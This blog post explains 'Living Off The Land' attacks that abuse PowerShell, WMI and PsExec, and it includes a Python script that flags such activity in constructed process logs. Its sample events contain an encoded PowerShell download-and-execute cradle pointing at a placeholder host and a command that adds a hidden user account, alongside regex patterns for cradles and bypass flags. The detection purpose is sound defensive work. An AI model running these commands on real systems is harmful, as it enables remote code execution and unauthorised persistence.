Why LOTL attacks are a major concern…
Have you heard about “Living Off The Land” attacks?
It is usually quite hard to judge the real, long-term impact of new cyber-attacks reported in the press. Some make a buzz for a very short time, while others actually change the way CyberSecurity is perceived and managed in most companies. For instance, APTs (Advanced Persistent Threats) and ransomware have drastically reshaped most CyberSecurity strategies over the last decade…
Well, LOTL attacks could be the right pick for the years to come…
So, what is it all about? The principle of LOTL attacks is that attackers don’t “bring” their own cyber-weapons into the victim’s Information System, but rather use what they “find” on the systems to execute all phases of the attack. After the initial intrusion, exploiting existing vulnerabilities on exposed systems, they propagate laterally, gain more privileges, perform Denial of Service, scan for and exfiltrate data (for instance) without needing to download any malware. Instead, they use what has been “left” there: tools installed “by default”, or allowed after installation, e.g. to monitor production systems and check their compliance. Typical examples are PowerShell, WMI (Windows Management Instrumentation) and PsExec, and quite often legitimate IT management or remote-administration software is used in the same malevolent way. Even a well-known attacker tool such as Mimikatz fits this picture: it is not found on the host, but it is routinely loaded straight into memory through PowerShell, so that no file ever touches the disk. Such attacks are therefore usually fileless, leaving few file-based IoCs (Indicators of Compromise, such as hashes of malicious executables) behind, so that they remain fully “under the radar” of signature-based antivirus. Even more scary, isn’t it?
So why are such attacks possible? Well, CyberSecurity is all about “hygiene” and proper IT management of systems: ensuring that only necessary software is installed on production systems, that rights are granted only to the users who need them, that software settings follow a validated configuration, etc. As usual, we all know what we should do, but hackers exploit our lack of discipline…
Such attacks may seem quite advanced and hard to perform, affordable only to expert hackers… but they aren’t. Some malware already rely on them, such as the info-stealer Astaroth described by the Microsoft Defender Security Research Team in March 2020.
So, how may these attacks be detected or traced? This is usually done by behavioral detection systems or deceptive CyberSecurity solutions. For sure, the processes, software and even accounts used are usually legitimate, but they are executed in an unusual way: an Office document spawning PowerShell, an encoded or hidden-window command line, a shell started by the WMI provider host, an administration tool run from a workstation that never used it before. That deviation from normal is what makes it possible to detect them and trigger an alert. Deception works differently: decoys such as canary files or canary credentials are planted where only an attacker exploring the system would touch them, and any access to a decoy raises an alarm. However, detection requires either a proper modelling of the “normal” behavior of our Information Systems, efficient behavioral analytics or Artificial Intelligence (typically available through Endpoint Detection & Response software – EDR), or advanced deceptive CyberSec solutions. None of this works without the raw telemetry, so enabling process-creation auditing with command lines and PowerShell script block logging is the first step. These are not “buzz words”, but rather highly relevant technologies to combat LOTL attacks! Of course, it also requires highly skilled SOC / CSIRT teams and Incident Response processes, on top of technology…
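To make the “legitimate tool, unusual way” idea concrete, here is an added example (not code from the original post, nor from any EDR vendor) that runs a handful of behavioral rules over constructed process-creation events in the spirit of Sysmon Event ID 1 / Windows 4688 records. The event records, the rule names, the payload URL and the field layout are all assumptions made for the example; real telemetry has many more fields, and the PowerShell parameter prefixes accepted here are a simplification.

```python
"""Toy behavioral detection of living-off-the-land activity in process-creation logs.

Added example: constructed events, hypothetical rule names, simplified parsing.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # image path of the parent process
    image: str     # image path of the created process
    cmdline: str   # command line of the created process


# Shells / script hosts that should rarely be spawned by Office or the WMI provider host.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe"}
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Download cradle / in-memory execution keywords (checked on the raw and the decoded command line).
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string",
    re.I)
# -EncodedCommand and the common abbreviations PowerShell accepts (assumption: this subset only).
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Flags that hide the console or disable the execution policy; benign admin scripts seldom need both.
BYPASS_RE = re.compile(r"-(?:ep|executionpolicy)\s+bypass|-w(?:indowstyle)?\s+hidden", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(ev: ProcEvent):
    """Names of the rules an event matches; an empty list means nothing suspicious."""
    hits = []
    parent, image = basename(ev.parent), basename(ev.image)
    decoded = decode_encoded_command(ev.cmdline)
    if decoded is not None:
        hits.append("encoded_powershell")
    # Look for cradles in the visible command line AND inside the decoded payload.
    text = ev.cmdline + ("\n" + decoded if decoded else "")
    if CRADLE_RE.search(text):
        hits.append("download_cradle")
    if BYPASS_RE.search(ev.cmdline):
        hits.append("policy_bypass_flags")
    if parent == "wmiprvse.exe" and image in SHELLS:
        hits.append("wmi_spawned_shell")      # remote WMI execution landing in a shell
    if "psexesvc.exe" in (parent, image):
        hits.append("psexec_service")         # PsExec pushed a service to this host
    if parent in OFFICE and image in SHELLS:
        hits.append("office_spawned_shell")   # macro or exploit launching a script host
    return hits


def analyse(events):
    """(index, hits) for every event that matched at least one rule."""
    results = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample data. The payload is encoded exactly as an attacker would encode it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              r"powershell.exe -NoProfile -Command Get-ChildItem C:\Logs"),      # benign admin use
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
              f"powershell.exe -nop -w hidden -enc {ENCODED}"),                  # macro -> cradle
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c whoami /all"),                                        # remote WMI exec
    ProcEvent(r"C:\Windows\PSEXESVC.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c net user backup P@ss /add"),                           # PsExec-pushed
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              r"svchost.exe -k netsvcs"),                                        # ordinary noise
]

if __name__ == "__main__":
    for i, hits in analyse(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)}")
```

Nothing in these rules looks at a file hash: every flagged binary is a signed Microsoft tool or a legitimate Sysinternals service. The signal comes entirely from who started what, and how, which is exactly what is lost when command-line auditing and script block logging are left off.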
Nevertheless, I believe that the emergence of such successful attacks remains a real threat, as it demonstrates how hard it is to manage, control and monitor IT systems in a secure manner without leaving hazardous tooling available on those systems. You need to scan for vulnerabilities? Then install the scanner, run it and remove it afterwards, or disconnect the system from the network once you are done, or at least put it behind a Privilege Management Gateway (a bastion / Privileged Access Management solution) so that the tool cannot be reached with ordinary credentials.
Get ready for it, or the naked bad guys in the wild will indeed defeat all of your armed soldiers!